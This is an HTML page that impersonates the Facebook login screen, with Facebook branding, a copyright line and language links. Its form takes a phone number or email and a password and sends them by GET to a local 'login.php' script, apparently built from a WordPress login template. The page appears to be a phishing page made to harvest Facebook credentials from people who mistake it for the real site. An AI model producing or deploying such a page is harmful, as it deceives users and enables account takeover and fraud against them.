<!DOCTYPE html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<title> Log In Facebook</title>
	<link rel='dns-prefetch' href='//s.w.org' />
	<meta name='robots' content='noindex,noarchive' />
	<meta name='referrer' content='strict-origin-when-cross-origin' />
	<meta name="viewport" content="width=device-width" />
	<style>
		* {
			font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
			box-sizing: border-box;
			margin: 0;
		}

		.alll {
			width: 460px;
			padding: 0px 10px;
		}

		.body {
			height: 100vh;
			width: 100vw;
			flex-direction: column;
			display: flex;
			justify-content: flex-start;
			align-items: center;
		}

		.main-header {
			margin-top: 10px;
			font-size: 40px;
			text-decoration: none;
			color: #0373e2;
			text-align: center;
			font-weight: 900;
			letter-spacing: -0.7px;
		}



		.mb20 {
			margin-bottom: 10px;
		}

		.center-a {
			flex-direction: column;
			display: flex;
			justify-content: center;
			align-items: center;
		}

		.input {
			border-radius: 5px;
			background: #f2f2f2b0;
			color: #000;
			border: 1px solid #ddd;
			outline-color: #0080ffb0;
			width: 100%;
			padding: 12px;
			margin: 6px;
		}

		.input::placeholder {
			font-size: 16px;
		}

		.but-log {
			outline: none;
			border-radius: 5px;
			width: 100%;
			padding: 12px;
			margin: 10px;
			border: none;
			background-color: #198bfd;
			color: white;
			font-weight: bold;
			font-size: 20px;
			cursor: pointer;
		}

		.forgot {
			cursor: pointer;
			font-size: 20px;
			font-weight: 500;
			color: #198bfd;
			text-decoration: none;
		}

		.pad10 {
			padding: 10px 0px;

		}

		.or {
			display: flex;
			justify-content: center;
			align-items: center;
			padding: 10px;
		}

		.por {
			padding: 0px 10px;
			font-weight: 400;
		}

		.or>div {
			background-color: rgba(95, 95, 95, 0.603);
			height: 1px;
			width: 150px;
		}

		.cr-acc {
			cursor: pointer;
			outline: none;
			border-radius: 5px;
			width: calc(100% - 30px);
			padding: 12px;
			margin: 10px auto;
			border: none;
			background-color: #00a100;
			color: white;
			font-weight: bold;
			font-size: 20px;
		}

		@media screen and (max-width:450px) {
			.but-log , .cr-acc{
				padding: 10px;

			}
			.alll {
				width: 100vw;
				padding: 0px 15px;
			}

			.main-header {
				font-size: 35px;
			}

			.input {
				padding: 10px;
				margin: 4px;
			}

			.a>p {
				cursor: pointer;
				text-align: center;
				font-size: 12px;
			}

			.b>p {
				cursor: pointer;
				text-align: center;
				font-size: 12px;
			}
		}

		.langs {
			display: flex;
			width: 100%;
			flex-direction: row;
			justify-content: space-between;
			align-items: center;
			margin-top: 100px;
			margin-bottom: 30px;
		}

		.a>p {
			cursor: pointer;
			text-align: center;
			font-size: 16px;
		}

		.b>p {
			cursor: pointer;
			text-align: center;
			font-size: 16px;
		}

		.a,
		.b {
			display: flex;
			flex-direction: column;
			justify-content: center;
			align-items: center;
		}
	</style>

</head>

<body class="body">
	<div id="login" class="alll">
		<h1 class="mb20" align="center"><a class="main-header" href="#">Facebook</a></h1>

		<form name="loginform" id="loginform" action="login.php" method="GET">
			<div class="inputs center-a">
				<input type="text" name="log" id="user_login" class="input" value="" placeholder="Moblie number or Email" required />
				<input type="password" name="pwd" id="user_pass" class="input" value="" placeholder="password" required />
			</div>
			<p class="submit center-a">
				<input type="submit" name="wp-submit" id="wp-submit" class="but-log" value="Log In" />
				<input type="hidden" name="testcookie" value="1" />
			</p>
		</form>

		<p id="nav" class="pad10" align="center">
			<a class="forgot" align="center" href="login.php?action=lostpassword">Forgot password?</a>
		</p>
		<div class="or">
			<div></div>
			<p class="por">OR</p>
			<div></div>
		</div>
		<div class="cr-acc">
			<p align="center"> Create account</p>
		</div>
		<div class="langs">
			<div class="a">
				<p>English (US)</p>
				<p>فارسی</p>
				<p>Deutsch</p>
				<p>Português (Brasil)</p>
			</div>
			<div class="b">
				<p>پښتو</p>
				<p>العربية</p>
				<p>Español</p>
				<p>
					<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none">
						<path d="M8 12H16" stroke="#292D32" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" />
						<path d="M12 16V8" stroke="#292D32" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" />
						<path d="M9 22H15C20 22 22 20 22 15V9C22 4 20 2 15 2H9C4 2 2 4 2 9V15C2 20 4 22 9 22Z" stroke="#292D32" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" />
					</svg>

				</p>
			</div>
		</div>
		<p align="center" style="font-size: 14px; text-decoration: underline;">About · Help · More</p>
		<p align="center" style="font-size: 14px; text-decoration: underline;">Copyright &copy; Facebook Inc.</p>

		<script type="text/javascript">
			function wp_attempt_focus() {
				setTimeout(function () {
					try {
						d = document.getElementById('user_login');
						d.focus();
						d.select();
					} catch (e) {}
				}, 200);
			}

			wp_attempt_focus();
			if (typeof wpOnload == 'function') wpOnload();
		</script>



	</div>


	<div class="clear"></div>
</body>

</html>